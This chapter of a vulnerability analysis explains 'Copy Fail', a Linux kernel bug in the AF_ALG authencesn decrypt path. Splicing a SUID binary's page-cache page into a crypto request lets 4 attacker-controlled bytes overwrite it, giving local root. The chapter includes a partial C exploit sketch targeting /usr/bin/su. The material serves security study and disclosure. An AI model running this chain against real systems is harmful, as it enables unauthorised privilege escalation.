4 Vulnerability Anatomy

4.1 Vulnerability Overview

At a high level, this bug lets an unprivileged user modify a few bytes of a root-owned executable "file", even though that file was only supposed to be read, not written.

The trick is that the write does not go through the normal filesystem write path at all. Instead, the attacker makes the kernel treat file-backed pages as part of a crypto request, and then relies on a buggy decrypt path to write 4 controlled bytes past the valid output boundary. Those bytes land in the in-memory page cache that backs the file, which a later execve() reuses.

So the bug is the opposite of copying. Instead of working on a private copy:

  • the target file page is first borrowed into a pipe by the zero-copy splice() path,
  • that page is then reused inside an AF_ALG AEAD decrypt request,
  • and the selected buggy authencesn() decrypt implementation writes 4 bytes into the wrong place.

If the chosen target is a SUID binary such as /usr/bin/su, corrupting its cached executable bytes is enough to turn a decrypt request into local privilege escalation. The request itself may fail, but that does not matter: the write has already landed.

4.2 Copy Fail Exploit Chain

After a deep dive through the Linux kernel, the exploit chain becomes easier to read. Each step below links back to the section where that mechanism was introduced.

  1. Pick a file-backed executable target whose bytes are served through the page cache. For privilege escalation, the target can be a root-owned SUID binary such as /usr/bin/su.
  2. Open an AF_ALG AEAD socket path for authencesn(hmac(sha256),cbc(aes)), so a later recvmsg() reaches the selected authencesn() decrypt path.
  3. Use sendmsg() to queue attacker-controlled AAD. Bytes 4..7 of that AAD become seqno_lo, the 4-byte value later written by crypto_authenc_esn_decrypt() during the "OOB" scatterlist walk.
  4. Use splice(file -> pipe) so the pipe holds a pipe_buffer referencing the target file's cached page, rather than a private copied buffer.
  5. Use the pipe -> socket splice path so that same pipe-backed page is forwarded through splice_to_socket(). Internally, the pipe buffer becomes a bio_vec, then a page-backed msg_iter marked with MSG_SPLICE_PAGES.
  6. On the accepted AF_ALG operation socket, af_alg_sendmsg() handles the MSG_SPLICE_PAGES payload and converts the page-backed iterator into the AEAD TX scatterlist. At this point, the target file's page-cache page has entered the crypto request path.
  7. Let _aead_recvmsg() build the decrypt request scatterlist: the valid RX output head is backed by the caller's receive buffer, while the preserved TX tag tail can still point at the spliced file-backed page.
  8. Trigger decrypt with recvmsg(). On the authencesn() decrypt path, the kernel performs the destination-side scratch write at assoclen + cryptlen.
  9. Because scatterwalk follows the chained scatterlist mechanically, that 4-byte write crosses the valid decrypt output boundary and lands in the next chained entry, which is backed by the target file's page-cache page.
  10. The decrypt operation fails authentication and returns an error, but the 4-byte overwrite remains in page cache. A later execve() of the target binary consumes the corrupted executable bytes.

Chained from the kernel perspective:

Exploit chain
════════════════════════════════════════════════════════════

1. choose target
   root-owned SUID executable
   e.g. /usr/bin/su


2. file page enters pipe
   splice(file -> pipe)
   pipe_buffer references cached file page


3. pipe page enters socket send path
   splice(pipe -> socket)
   pipe_buffer -> bio_vec -> msg_iter
   MSG_SPLICE_PAGES


4. page enters AF_ALG TX scatterlist
   af_alg_sendmsg()
   extract_iter_to_sg()


5. attacker-controlled AAD is queued
   AAD[4:8] = seqno_lo
   4-byte value to be written later


6. decrypt request is built
   _aead_recvmsg()
   RX output head + chained TX tag tail


7. authencesn decrypt runs
   crypto_authenc_esn_decrypt()


8. destination-side scratch write
   scatterwalk_map_and_copy(...,
                            dst,
                            assoclen + cryptlen,
                            4,
                            out = 1)


9. scatterwalk follows sg_next()
   valid RX output -> chained TX tag entry


10. page-cache overwrite
    4 attacker-controlled bytes land in cached file page


11. later execve()
    kernel executes corrupted cached executable bytes

In compact form:

SUID file page → splice(file -> pipe) → pipe_buffer refs cached page → splice(pipe -> socket) → msg_iter with MSG_SPLICE_PAGES → AF_ALG TX scatterlist → TX tag tail chained after RX output → authencesn scratch write @ assoclen+cryptlen → scatterwalk follows sg_next() → 4-byte page-cache overwrite → later execve() runs corrupted cached executable bytes

4.3 Vulnerable Execution Path

This section closes the last gap left at the end of Chapter 3. We already proved the algorithm-side write in authencesn(); now we follow one target file page until it becomes the chained TX-side scatterlist entry that sits behind the decrypt boundary.

4.3.1 File-to-pipe Page Installation

The first half of the primitive comes from the regular-file splice() path:

splice() → do_splice() → splice_file_to_pipe() → do_splice_read() → filemap_splice_read() → splice_folio_into_pipe()

The important effect is that splice_folio_into_pipe() creates a struct pipe_buffer that directly references the file-backed page-cache page:

C
*buf = (struct pipe_buffer) {
    .ops    = &page_cache_pipe_buf_ops,
    .page   = page,    // cached file page
    .offset = offset,  // target file offset on page
    .len    = part,
};

So after splice(file -> pipe), the pipe does not hold an anonymous copy of the file data. It holds a pipe-buffer entry pointing at the cached file page itself.

Plaintext
target file offset
    |
    v
cached file page in page cache (folio/page)
    |
    v
pipe buffer references that page

That gives the first half of the primitive:

Plaintext
target file offset -> cached file page -> pipe buffer reference
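The difference between a referencing pipe entry and a copying one can be sketched in a few lines of userspace C. This is a toy model only: `model_page`, `model_pipe_buffer`, and the `model_*` helpers are hypothetical names invented for illustration and are not kernel types or APIs.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define MODEL_PAGE_SIZE 4096

/* Hypothetical stand-in for a page-cache page; not the kernel's struct page. */
struct model_page {
    unsigned char data[MODEL_PAGE_SIZE];
};

/* Hypothetical stand-in for struct pipe_buffer: a page reference plus a window. */
struct model_pipe_buffer {
    struct model_page *page;
    size_t offset;
    size_t len;
};

/* Zero-copy install: the pipe entry points at the cached page itself. */
static struct model_pipe_buffer model_splice_ref(struct model_page *cached,
                                                 size_t offset, size_t len)
{
    assert(offset <= MODEL_PAGE_SIZE && len <= MODEL_PAGE_SIZE - offset);
    struct model_pipe_buffer buf = { .page = cached, .offset = offset, .len = len };
    return buf;
}

/* Copying install, for contrast: the pipe entry points at a private page. */
static struct model_pipe_buffer model_splice_copy(const struct model_page *cached,
                                                  struct model_page *private_page,
                                                  size_t offset, size_t len)
{
    assert(offset <= MODEL_PAGE_SIZE && len <= MODEL_PAGE_SIZE - offset);
    memcpy(private_page->data + offset, cached->data + offset, len);
    struct model_pipe_buffer buf = { .page = private_page, .offset = offset, .len = len };
    return buf;
}

/* Returns 1 when the pipe entry aliases the cached page, 0 otherwise. */
static int model_aliases(const struct model_pipe_buffer *buf,
                         const struct model_page *cached)
{
    return buf->page == cached;
}
```

In this model, a store through the entry returned by `model_splice_ref()` is visible in the cached page, while a store through the entry returned by `model_splice_copy()` is not. The splice() path described above behaves like the first case.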

At this point, no corruption has happened yet. The only state we have is a file-backed page-cache page represented by a pipe buffer. The next question is how that pipe buffer reaches the AF_ALG request path.

4.3.2 Pipe Page Into TX Scatterlist

The pipe now references a cached file page. The exploit needs that same page reference to become crypto input, so the next step is splice(pipe -> AF_ALG socket).

That handoff happens when pipe data is spliced into the accepted AF_ALG operation socket. In splice_to_socket(), the kernel consumes pipe buffers and describes their backing pages as bio_vec entries (fs/splice.c:869-891):

C
struct pipe_buffer *buf = &pipe->bufs[tail & mask];  // pipe buffer
...

bvec_set_page(
    &bvec[bc++],
    buf->page,    // page referenced by pipe_buffer
    seg,          // length
    buf->offset   // offset inside that page
);

...

msg.msg_flags = MSG_SPLICE_PAGES;  // [!]

...

ret = sock_sendmsg(sock, &msg);

The important part is:

pipe_buffer page
        |
        v
bio_vec entry
        |
        v
socket sendmsg with MSG_SPLICE_PAGES

So the page is not copied into a normal userspace buffer. It is carried forward as a page-backed iterator into the socket send path.

For the accepted AF_ALG AEAD socket, sock_sendmsg() dispatches into aead_sendmsg(), which immediately forwards into af_alg_sendmsg():

sock_sendmsg()
        |
        v
aead_sendmsg()
        |
        v
af_alg_sendmsg()

Inside af_alg_sendmsg(), the exploit-relevant path is selected by MSG_SPLICE_PAGES (af_alg.c:1040-1061):

C
static int af_alg_sendmsg(struct socket *sock,
                          struct msghdr *msg,  // sendmsg() message from user space 
                          size_t size,
                          unsigned int ivsize)
{
    ...


    // msg.msg_flags = MSG_SPLICE_PAGES
    if (msg->msg_flags & MSG_SPLICE_PAGES) {
        struct sg_table sgtable = {
            .sgl        = sg,        // TX scatterlist
            .nents      = sgl->cur,  // used entries
            .orig_nents = sgl->cur,
        };

        // [!] conversion
        plen = extract_iter_to_sg(   
            &msg->msg_iter,           // spliced/page-backed iterator
            len,
            &sgtable,                 // append into sg table
            MAX_SGL_ENTS - sgl->cur,
            0
        );

        ...

        for (; sgl->cur < sgtable.nents; sgl->cur++)
            get_page(sg_page(&sg[sgl->cur]));  // keep page alive
    ...

This is the conversion point:

pipe-backed iterator
        |
        v
extract_iter_to_sg()
        |
        v
AF_ALG TX scatterlist entry

So the full bridge is:

cached file page
        |
        v
pipe buffer references that page
        |
        v
splice_to_socket()
        |
        v
MSG_SPLICE_PAGES sendmsg
        |
        v
af_alg_sendmsg()
        |
        v
extract_iter_to_sg()
        |
        v
TX scatterlist entry

At this point, the target file page is no longer only sitting behind a pipe buffer. It has become part of the AEAD request's TX scatterlist. It is still only input, though; the write becomes possible only after _aead_recvmsg() builds the in-place decrypt layout.

file-backed page enters AEAD TX path
═══════════════════════════════════════════════

┌────────────────────────────┐
│ target file page cache     │
│ /usr/bin/su @ offset X     │
└──────────────┬─────────────┘
               │ splice(file -> pipe)
               ▼
┌────────────────────────────┐
│ pipe buffer                │
│ references cached page     │
└──────────────┬─────────────┘
               │ splice(pipe -> AF_ALG socket)
               │ MSG_SPLICE_PAGES
               ▼
┌────────────────────────────┐
│ AF_ALG TX scatterlist      │
│ sg entry references page   │
└────────────────────────────┘
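The key property of this bridge is that each conversion copies a small descriptor (page, offset, length) and never the bytes behind it. A minimal userspace sketch of that idea follows. All `model_*` types and functions are hypothetical illustrations; they only mirror the field roles seen in the excerpts above and are not the kernel's definitions.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for a page-cache page. */
struct model_page { unsigned char data[4096]; };

/* Hypothetical descriptors mirroring the roles of pipe_buffer, bio_vec, scatterlist. */
struct model_pipe_buffer { struct model_page *page; size_t offset; size_t len; };
struct model_bio_vec     { struct model_page *page; size_t len;    size_t offset; };
struct model_sg_entry    { struct model_page *page; size_t offset; size_t length; };

/* Models the bvec_set_page() step: describe `seg` bytes of the pipe buffer's page. */
static struct model_bio_vec model_bvec_from_pipe(const struct model_pipe_buffer *buf,
                                                 size_t seg)
{
    assert(seg <= buf->len);
    struct model_bio_vec bv = { .page = buf->page, .len = seg, .offset = buf->offset };
    return bv;
}

/* Models the extract_iter_to_sg() step: the sg entry inherits the same page pointer. */
static struct model_sg_entry model_sg_from_bvec(const struct model_bio_vec *bv)
{
    struct model_sg_entry sg = { .page = bv->page, .offset = bv->offset, .length = bv->len };
    return sg;
}
```

After both conversions, the resulting entry's `page` field still equals the original cached page pointer, which is the model's version of "the target file page has entered the TX scatterlist".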

4.3.3 Chained Decrypt Request Layout

Now the AF_ALG operation socket has both ingredients:

  • attacker-controlled AAD submitted through the normal sendmsg() path;
  • file-backed TX scatterlist entries imported through the MSG_SPLICE_PAGES path.

_aead_recvmsg() is where those two ingredients are combined. It converts the queued TX state and the caller's RX buffer into the final AEAD decrypt request.

On the decrypt path, the construction happens in three steps:

  1. copy output-sized prefix: from TX (AAD || ciphertext || tag) to RX (AAD || ciphertext)
  2. preserve the leftover TX tag tail
  3. chain preserved tag after RX head: RX head → TX tag tail

The final request shape is:

AEAD decrypt request
════════════════════════════════════════════════════

req->src  ──▶ RX head ───────────────▶ TX tag tail
         [ AAD || ciphertext ]           [tag]

req->dst  ──▶ RX head
         [ AAD || plaintext  ]  
                             ^
                           valid output ends here

The exploit-relevant detail is the TX tag tail:

  • preserved input tag region
  • chained after the RX output head
  • can still be backed by the spliced file page

This is the exact point where the file-backed page imported through the pipe becomes the next scatterlist entry after the valid decrypt output region. The page is now positioned behind the boundary; the remaining missing piece is a write that starts at that boundary.
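The three construction steps can be modelled in userspace as follows. This is a simplified sketch under stated assumptions, not the code of _aead_recvmsg(): the TX data is treated as one flat buffer, each scatterlist is a single entry, and `model_sg` and `model_build_decrypt_layout()` are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical one-buffer scatterlist entry with an explicit chain pointer. */
struct model_sg {
    unsigned char *buf;
    size_t len;
    struct model_sg *next;
};

/*
 * Build dst = RX head -> TX tag tail.
 *   tx       : AAD || ciphertext || tag (tx_len bytes)
 *   authsize : tag length
 *   rx       : caller buffer with room for tx_len - authsize bytes
 */
static void model_build_decrypt_layout(unsigned char *tx, size_t tx_len,
                                       size_t authsize, unsigned char *rx,
                                       struct model_sg *rx_head,
                                       struct model_sg *tag_tail)
{
    assert(authsize <= tx_len);
    size_t outlen = tx_len - authsize;

    /* Step 1: copy the output-sized prefix (AAD || ciphertext) from TX to RX. */
    memcpy(rx, tx, outlen);

    /* Step 2: the tag is not copied; the tail entry keeps pointing into TX memory. */
    tag_tail->buf = tx + outlen;
    tag_tail->len = authsize;
    tag_tail->next = NULL;

    /* Step 3: chain the preserved tag tail directly after the RX head. */
    rx_head->buf = rx;
    rx_head->len = outlen;
    rx_head->next = tag_tail;
}
```

In the model, anything that walks past `rx_head.len` bytes continues into memory that still belongs to the TX side. In the exploit path that memory is the spliced file-backed page.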

4.3.4 Authencesn Scratch Write

The previous step leaves us with a decrypt request whose req->dst starts at the RX head, while the preserved TX tag tail is chained immediately after that valid output region. Nothing has been overwritten yet; _aead_recvmsg() has only constructed the shape.

The overwrite happens only when that prepared request is submitted to the selected AEAD implementation. In this path, crypto_aead_decrypt() dispatches the request into crypto_authenc_esn_decrypt(), the decrypt callback for authencesn(hmac(sha256),cbc(aes)).

The exploit-relevant lines are:

C
cryptlen -= authsize;

...

/*
 * Read the first 8 bytes from dst into tmp.
 *
 * In this request layout, dst starts at the RX head,
 * whose first bytes are the AAD.
 */
scatterwalk_map_and_copy(
    tmp,
    dst,
    0,
    8,
    0  // read flag: scatterlist -> tmp
);

/*
 * Write tmp[0] (AAD[0:4]) back into dst at offset 4.
 */
scatterwalk_map_and_copy(
    tmp,
    dst,
    4,
    4,
    1  // write flag: tmp -> scatterlist
);

/*
 * Write tmp[1] (AAD[4:8]) at the decrypt boundary.
 *
 * This is the Copy Fail write.
 */
scatterwalk_map_and_copy(
    tmp + 1,
    dst,
    assoclen + cryptlen,
    4,
    1  // write flag: tmp -> scatterlist
);

The first scatterwalk_map_and_copy() reads 8 bytes from the beginning of dst into tmp. Since req->dst starts at the RX head, and the RX head begins with the AAD, this captures:

tmp
┌────────────┬────────────┐
│ tmp[0]     │ tmp[1]     │
│ AAD[0:4]   │ AAD[4:8]   │
└────────────┴────────────┘

So the attacker-controlled bytes staged in AAD[4:8] become tmp + 1.

Then authencesn() uses that tmp + 1 pointer as the source of the second scratch write:

C
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);

That gives the value flow:

AAD[4:8]  ->   read into tmp[1] (tmp+1) ->  4-byte scratch write source

The offset side is separate. cryptlen is first reduced by the tag size:

cryptlen -= authsize;

So at the time of the write:

cryptlen = ciphertext length

and the destination offset becomes:

assoclen + cryptlen
= AAD length + ciphertext length
= end of valid decrypt output

Therefore the write operation is:

value  = AAD[4:8]
target = dst @ assoclen + cryptlen
size   = 4 bytes
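The offset arithmetic can be checked with a small helper. The function name `model_scratch_offset()` is hypothetical, and the lengths used in the note below are illustrative values rather than the ones a real request must use.

```c
#include <assert.h>
#include <stddef.h>

/*
 * Returns the dst offset used by the scratch write:
 * assoclen + cryptlen, evaluated after `cryptlen -= authsize`.
 *   req_cryptlen : ciphertext length plus tag length, as submitted
 */
static size_t model_scratch_offset(size_t assoclen, size_t req_cryptlen,
                                   size_t authsize)
{
    assert(req_cryptlen >= authsize);
    size_t cryptlen = req_cryptlen - authsize;  /* ciphertext length only */
    return assoclen + cryptlen;                 /* first byte past valid output */
}
```

For example, with an 8-byte AAD, 16 bytes of ciphertext, and a 16-byte tag, `model_scratch_offset(8, 32, 16)` yields 24. The valid output occupies offsets 0 through 23, so the 4-byte write starts exactly one byte past it.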

Visually:

valid decrypt output
┌────────────┬────────────────────┐
│    AAD     │     plaintext      │
└────────────┴────────────────────┘
                                  ^

              AAD[4:8] is written here as 4 bytes

Because scatterwalk_map_and_copy() walks the destination scatterlist mechanically, the write does not stop just because the valid AEAD output ends there. If another scatterlist entry is chained after the RX head, sg_next() carries the write forward into it.

In this exploit path, that next entry is the preserved TX tag tail backed by the spliced file page. That completes the bridge from attacker-controlled AAD bytes to a page-cache-backed destination.
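The whole value-and-offset flow can be reproduced in a userspace toy model. The sketch below assumes a simplified chained list with one buffer per entry. `model_sg`, `model_map_and_copy()`, and `model_esn_scratch()` are hypothetical names that only imitate the behaviour described above, not the kernel implementation.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical one-buffer scatterlist entry with an explicit chain pointer. */
struct model_sg {
    unsigned char *buf;
    size_t len;
    struct model_sg *next;
};

/*
 * Copy nbytes between buf and the chain, starting at byte offset `start`.
 * out = 0 reads from the chain into buf; out = 1 writes buf into the chain.
 * The walk follows `next` mechanically and knows nothing about AEAD boundaries.
 */
static void model_map_and_copy(void *buf, struct model_sg *sg,
                               size_t start, size_t nbytes, int out)
{
    unsigned char *p = buf;

    /* Skip whole entries until `start` falls inside the current one. */
    while (sg && start >= sg->len) {
        start -= sg->len;
        sg = sg->next;
    }
    while (nbytes) {
        assert(sg != NULL);  /* the model refuses to run off the chain */
        size_t n = sg->len - start;
        if (n > nbytes)
            n = nbytes;
        if (out)
            memcpy(sg->buf + start, p, n);
        else
            memcpy(p, sg->buf + start, n);
        p += n;
        nbytes -= n;
        start = 0;
        sg = sg->next;
    }
}

/* The three calls from the excerpt above, applied to the model chain. */
static void model_esn_scratch(struct model_sg *dst, size_t assoclen, size_t cryptlen)
{
    uint32_t tmp[2];

    model_map_and_copy(tmp, dst, 0, 8, 0);                        /* tmp = AAD[0:8]      */
    model_map_and_copy(tmp, dst, 4, 4, 1);                        /* AAD[0:4] -> dst @ 4 */
    model_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);  /* AAD[4:8] -> boundary */
}
```

With a 24-byte head entry (8 bytes of AAD plus 16 bytes of ciphertext) chained to a second entry, calling `model_esn_scratch(&head, 8, 16)` leaves the head's valid region otherwise intact and places the original AAD[4:8] bytes at offset 0 of the second entry.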

4.3.5 Page-cache Overwrite Primitive

Now the two halves meet. The previous step showed the write gadget:

C
scatterwalk_map_and_copy(
    tmp + 1,
    dst, 
    assoclen + cryptlen,  // scatterlist walk oob
    4, // bytes to write
    1  // write flag
);

From 4.3.4, the value comes from the AAD:

AAD[4:8] -> tmp + 1 -> 4-byte scratch write source

By itself, that is only a 4-byte destination-side scatterlist write. It becomes the Copy Fail primitive because of the request layout built earlier: dst starts at the RX output head, but the scatterlist does not stop there. After the valid decrypt output region, it continues into the preserved TX tag entry.

That preserved TX tag entry came from the spliced pipe path. Earlier, af_alg_sendmsg() imported the MSG_SPLICE_PAGES payload into the AEAD TX scatterlist, so the chained tag entry can still reference the target file's cached page.

Now the primitive is fully assembled:

  • WHAT to write:
    • AAD[4:8] / seqno_lo
  • HOW the write happens:
    • authencesn scratch write
    • scatterwalk_map_and_copy(..., dst, assoclen + cryptlen, 4, out = 1)
  • WHERE it lands:
    • chained TX tag entry
    • spliced file-backed page

So the write path is:

attacker input
──────────────
AAD[4:8] / seqno_lo
        │
        ▼
authencesn scratch write
────────────────────────
scatterwalk_map_and_copy(tmp + 1,
                         dst,
                         assoclen + cryptlen,
                         4,
                         out = 1)
        │
        ▼
scatterlist crossing
────────────────────
dst output boundary
        │
        │ sg_next()
        ▼
preserved TX tag entry
        │
        ▼
file-backed page-cache page

This is the core Copy Fail primitive: a 4-byte attacker-controlled value is written through the AEAD destination scatterlist into a page-cache-backed entry.

The important point is that userspace never performs a normal write() to the target file. The file page is first imported through splice(), then carried into the AF_ALG TX scatterlist, and finally overwritten by the kernel-side authencesn scratch write.

To turn this into a write-what-where primitive, we need the syscall shape below, which is how userspace arranges those kernel states.

4.3.6 Syscall-level Primitive

At the syscall level, the primitive is not a normal file write. Userspace only arranges two things:

  • the 4-byte value to write, staged through AAD[4:8]
  • the file-backed target page, staged through splice()

Then it triggers the kernel-side decrypt path.

A sketch of the exploit workflow:

C
/*
 * This is a syscall-level sketch, not a complete standalone exploit.
 * Key setup, authsize setup, IV/control messages, exact offsets, and
 * error handling are intentionally collapsed so primitive shape stays visible.
 */

/* 1. Open the AF_ALG AEAD transform. */
int tfm_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);

struct sockaddr_alg sa = {
    .salg_family = AF_ALG,
    .salg_type   = "aead",
    .salg_name   = "authencesn(hmac(sha256),cbc(aes))",
};

bind(tfm_fd, (struct sockaddr *)&sa, sizeof(sa));

/*
 * 2. Configure key/authsize, then accept the operation socket.
 *
 * setsockopt(tfm_fd, SOL_ALG, ALG_SET_KEY, ...);
 * setsockopt(tfm_fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, ...);
 */
int op_fd = accept(tfm_fd, NULL, NULL);

/*
 * Victim target:
 *
 * The first splice selects the target file-backed page that we want
 * to carry into the pipe, and later into the AF_ALG TX scatterlist.
 */
char *victim = "/usr/bin/su";
int target_file_fd = open(victim, O_RDONLY);

off_t target_file_offset = 0x1234;  /* victim file/page selection offset */
size_t splice_len = 0x1000;         /* enough bytes for the planned TX layout */

int pipe_fds[2];
pipe(pipe_fds);

/*
 * 3. Queue attacker-controlled AAD.
 *
 * AAD[4:8] becomes seqno_lo.
 * authencesn later writes these 4 bytes through:
 *
 *     scatterwalk_map_and_copy(tmp + 1,
 *                              dst,
 *                              assoclen + cryptlen,
 *                              4,
 *                              1);
 */
uint8_t write_value[4] = { 'P', 'W', 'N', '!' };
uint8_t aad[8];

memset(aad, 'A', 4);              /* AAD[0:4] */
memcpy(aad + 4, write_value, 4);  /* AAD[4:8] = seqno_lo */

struct iovec aad_iov = {
    .iov_base = aad,
    .iov_len  = sizeof(aad),
};

struct msghdr aad_msg = {
    .msg_iov        = &aad_iov,
    .msg_iovlen     = 1,
    .msg_control    = cmsg_buf,   /* ALG_SET_OP / ALG_SET_AEAD_ASSOCLEN / IV */
    .msg_controllen = cmsg_len,
};

/*
 * MSG_MORE keeps the AF_ALG request open so more input can be appended.
 */
sendmsg(op_fd, &aad_msg, MSG_MORE);

/*
 * 4. Splice the target file page into a pipe.
 *
 * Kernel-side effect:
 *
 *     target file page cache
 *         -> pipe_buffer
 */
splice(
    target_file_fd,
    &target_file_offset,
    pipe_fds[1],
    NULL,
    splice_len,
    0
);

/*
 * 5. Splice the pipe into the AF_ALG operation socket.
 *
 * Kernel-side effect:
 *
 *     pipe_buffer
 *         -> bio_vec
 *         -> msg_iter marked MSG_SPLICE_PAGES
 *         -> AF_ALG TX scatterlist
 */
splice(
    pipe_fds[0],
    NULL,
    op_fd,
    NULL,
    splice_len,
    0
);

/*
 * 6. Trigger decrypt.
 *
 * rx_buf is the normal caller-provided receive buffer.
 *
 * _aead_recvmsg() builds:
 *
 *     RX output head -> preserved TX tag tail
 *
 * Then authencesn performs the destination-side scratch write.
 */
recv(op_fd, rx_buf, rx_len, 0);

The exact offset choreography is handled later (see 5.2). For now, the important mapping is:

  • target_file_offset → selects file-backed page entering pipe
  • AF_ALG decrypt layout → positions that page inside the preserved TX tag tail
  • assoclen + cryptlen → makes the authencesn scratch write land at the RX/TX chain boundary

Read as one execution stream:

controlled AAD[4:8]
        │
        │ sendmsg()
        ▼
AF_ALG request input
        │
        │ splice(file -> pipe)
        ▼
pipe references target page-cache page
        │
        │ splice(pipe -> AF_ALG socket)
        ▼
AF_ALG TX scatterlist contains page-backed entry
        │
        │ recv()
        ▼
_aead_recvmsg() chains TX tag tail after RX output
        │
        │ authencesn decrypt
        ▼
AAD[4:8] written at dst @ assoclen + cryptlen

The decrypt may fail authentication, but that failure is not a rollback point. The scratch write has already happened.
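The "no rollback" point is an ordering property and can be illustrated with a deliberately tiny model. `model_decrypt()` is a hypothetical function, and the flat destination buffer and the `tag_ok` flag are simplifying assumptions. The only real-world detail borrowed here is the -EBADMSG error code commonly returned for an authentication failure.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <string.h>

/*
 * Toy decrypt: performs the scratch write first, then checks the tag.
 * Returns 0 on success or -EBADMSG when the tag check fails.
 * Nothing undoes the earlier write on the error path.
 */
static int model_decrypt(unsigned char *dst, size_t dst_len, size_t boundary,
                         const unsigned char value[4], int tag_ok)
{
    assert(boundary <= dst_len && dst_len - boundary >= 4);

    memcpy(dst + boundary, value, 4);  /* scratch write happens before verification */

    if (!tag_ok)
        return -EBADMSG;               /* authentication failed; dst stays modified */
    return 0;
}
```

A caller that sees -EBADMSG from this model will still find the 4 bytes at `dst + boundary` changed, which mirrors why the failed recv() in the sketch above is not a problem for the attacker.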

4.3.7 Execution from Corrupted Cache

After the overwrite, the target file's page-cache page contains modified bytes. For an executable file, later execve() may consume those cached bytes as instruction data.

For a root-owned SUID target, that means:

4-byte page-cache overwrite
        │
        ▼
corrupted executable page
        │
        ▼
later execve()
        │
        ▼
modified code runs in SUID program context

At this point, the remaining exploit work is to place attacker-controlled patch bytes into the victim file's page-cache page.

Chapter 7 turns this primitive into working exploit implementations in several languages. Before that, Chapter 5 walks through a quick PoC to show how an exploit is constructed, and Chapter 6 presents runtime debugging evidence.